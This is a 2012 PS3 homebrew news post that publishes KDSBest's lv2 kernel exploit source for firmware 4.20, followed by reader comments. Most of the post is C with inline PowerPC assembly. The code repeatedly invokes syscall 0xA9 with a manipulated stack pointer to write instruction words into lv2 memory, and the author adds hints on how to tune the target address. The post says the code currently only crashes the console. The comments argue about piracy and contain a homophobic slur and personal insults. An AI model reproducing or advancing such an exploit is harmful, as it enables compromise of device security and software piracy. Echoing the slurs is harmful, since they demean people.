KDSBest And His lv2 Exploit


Submitted by tbag; September 23, 2012


Well-known developer KDSBest has released his lv2 exploit to the development community in the hope of opening the PS3 up to homebrew. Using Firmware 4.20, KDSBest has managed to achieve an lv2 exploit on the PS3; unfortunately, at this point all it does is crash the PS3 by overwriting some memory addresses. In the right hands and with some hard work we could see progress in the future, who knows.

 

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

// Pin the variables to fixed PPU registers so the payload survives the syscall.
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");

int __volatile__ main(int argc, const char* argv[])
{
    // backup Stack pointer
    bufferStackpointer = stackpointer;

    // 0x3960024F is the encoding of "li r11, 0x24F" (doubled to fill 64 bits)
    payloadHolder = 0x3960024F3960024FUL;
    // 0x44000002 is the encoding of "sc" (doubled to fill 64 bits)
    payloadHolder2 = 0x4400000244000002UL;

    // Incrementer
    counter = 0x00;

    // Play with that address till the panic is executed, I lack the time to do so.
    // Always add 2 or 4 to it, I would try 4 or 8... bla bla, you will get the idea.
    stackpointer = 0x8000000000000100UL;
doItAgain:
    // KDSBest Payload
    // Prepare for our Syscall

    asm("li %r0, 0x0");
    asm("li %r3, 0x6");
    asm("li %r4, 0x1");
    // li r11, 0x24F -> PANIC
    asm("mr %r22, %r20");
    asm("mr %r23, %r20");
    asm("mr %r24, %r20");
    asm("mr %r27, %r20");
    asm("mr %r28, %r20");
    asm("mr %r29, %r20");
    asm("mr %r30, %r20");
    asm("mr %r31, %r20");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;

    // We write sc
    asm("mr %r22, %r21");
    asm("mr %r23, %r21");
    asm("mr %r24, %r21");
    asm("mr %r27, %r21");
    asm("mr %r28, %r21");
    asm("mr %r29, %r21");
    asm("mr %r30, %r21");
    asm("mr %r31, %r21");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;

    if(counter < 0x1000000)
        goto doItAgain;

    // restore the original stack pointer before returning
    stackpointer = bufferStackpointer;
    return 0;
}





Tags: homebrew, kdsbest, lv2 exploit, PS3 Hacks






Comments 


 
# coderewired 2012-09-23 18:51
so maybe you need to change that 0x00 address till the panic is executed


 
# Wowww 2012-09-23 21:46 (RE: KDSBest And His lv2 Exploit)
Wow awesome way to let sony know so they can fix it in next firmware release. Awesome...


 
# John4565 2012-09-24 08:09 (RE: KDSBest And His lv2 Exploit)
"cmon devs, you can do better than this... we don't want this shitty code, we want a pup that we can run directly from our xmb and hack our consoles (just like in geohot days, that guy was a true hacker), so that we can download tons of games and play for free! I'm getting tired of having to come to this website erryday just to find out that you couldn't do it, or that you wasted my time developing shitty homebrew games or shitty apps that nobody uses... I'm getting disappointed..."

you mad already? This is what you get for trying hard: a bunch of lazy faggots that will use your knowledge to steal software. The part of the community that actually enjoys the homebrew scene for its hacking potential, and control of a device that you own (etc, etc), represents like 5% or less of the people interested in the scene; the other 95% are the entire population of brazil, that is solely interested in playing the new Fifa 13 and PES 2013 without paying, and stealing software... I think that the scene should stop as it is. We have a custom fw already, and we don't need another. Nobody uses their custom firmware just to play the games that they own, this is the dumbest excuse for piracy; the old models of the ps3 are today fully hackable, and that is enough in my opinion. =)


 
# aihooo44 2012-09-24 09:28 (RE: RE: KDSBest And His lv2 Exploit)
you're so dumb, this is how geohot's pup firmware that you used started: with devs helping each other out with code like this, which will lead to a pup update file for people like you who do not do anything to help the scene but whine


 
# John4565 2012-09-24 15:56 (RE: RE: RE: KDSBest And His lv2 Exploit)
man have you read my entire post? I don't use custom firmwares! I Don't steal software, I am a game dev myself, and I DON'T WANT PPL STEALING MY WORK SOMEDAY!


 
# nnnjc 2012-09-25 16:13 (RE: RE: RE: RE: KDSBest And His lv2 Exploit)
don't worry, no one will pirate your games. no one will play your games even if you pay them to.


 
# Dbrig 2012-09-27 03:35 (RE: RE: RE: RE: RE: KDSBest And His lv2 Exploit)
Well you're just one gamer. I'd like to get my own opinion, so is there any way you could email me copies of the games of his that you've played?

I'm sure that your opinion is valuable and credible since you've obviously spent so much time playing his games but I would like to try them as well.


 
# Paulxxx 2012-09-24 09:12
John4565 - get a life, get a job and get out from internet, asshole


 
# huhkillpacient 2012-09-26 19:17
to be honest I can barely wait for a new cfw... I buy my games but I like to keep the discs intact ..

